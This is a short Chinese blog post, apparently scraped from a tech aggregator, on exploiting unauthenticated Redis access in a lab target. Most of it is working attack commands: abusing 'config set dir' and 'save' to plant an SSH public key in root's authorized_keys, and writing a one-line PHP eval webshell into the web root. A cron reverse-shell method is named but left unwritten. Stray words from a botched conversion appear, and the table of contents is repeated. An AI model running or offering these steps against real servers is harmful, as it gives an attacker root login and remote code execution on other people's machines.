Redis未受权访问漏洞利用

时间 2020-01-08

标签 redis 受权访问漏洞利用栏目 Redis 繁體版

原文原文链接

0x00 测试环境

漏洞靶场：https://github.com/Medicean/VulApps/tree/master/r/redis/1
链接工具：https://redis.io/download

0x01 测试是否存在未受权访问漏洞

使用redis-cli尝试链接目标6379端口
#./redis-cli -h 192.168.233.131 -p 6379    //6379为默认端口，这里映射为32773，若是存在弱口令，能够经过参数-a [password]链接

此时能够看到已链接成功
php

0x02 多姿式漏洞利用

姿式1：写入公钥，经过私钥免密链接

一、在本地/root/.ssh目录下生成rsa密钥对 //id_rsa私钥，链接时用；id_rsa.pub公钥，上传内容至目标服务器html

二、经过redis命令，将公钥写入到目标服务器git

> config set dir /root/.ssh/    //指定存放路径
> config set dbfilename "authorized_keys"    //指定上传的文件名
> set authorized_keys "公钥内容"    //将公钥写入到文件中，可略过这条命令
> save    //保存

三、使用ssh命令链接目标github

# ssh root@192.168.233.131 -p 32774 -i ~/.ssh/id_rsa    //-i 指定私钥文件 ，这里提示须要密码的缘由应该是authorized_keys文件权限太低（chmod 700 authorized_keys）

姿式2：若目标服务器有web服务，可直接写入一句话木马

> config set dir /var/www/html/
> config set dbfilename "1.php"
> set 1 "<?php eval($_POST[cmd]);?>"
> save

Redis未受权访问漏洞利用

0x00 测试环境

0x01 测试是否存在未受权访问漏洞

0x02 多姿式漏洞利用

姿式1：写入公钥，经过私钥免密链接

姿式2：若目标服务器有web服务，可直接写入一句话木马

姿式3：写入定时计划任务反弹shell【待补充】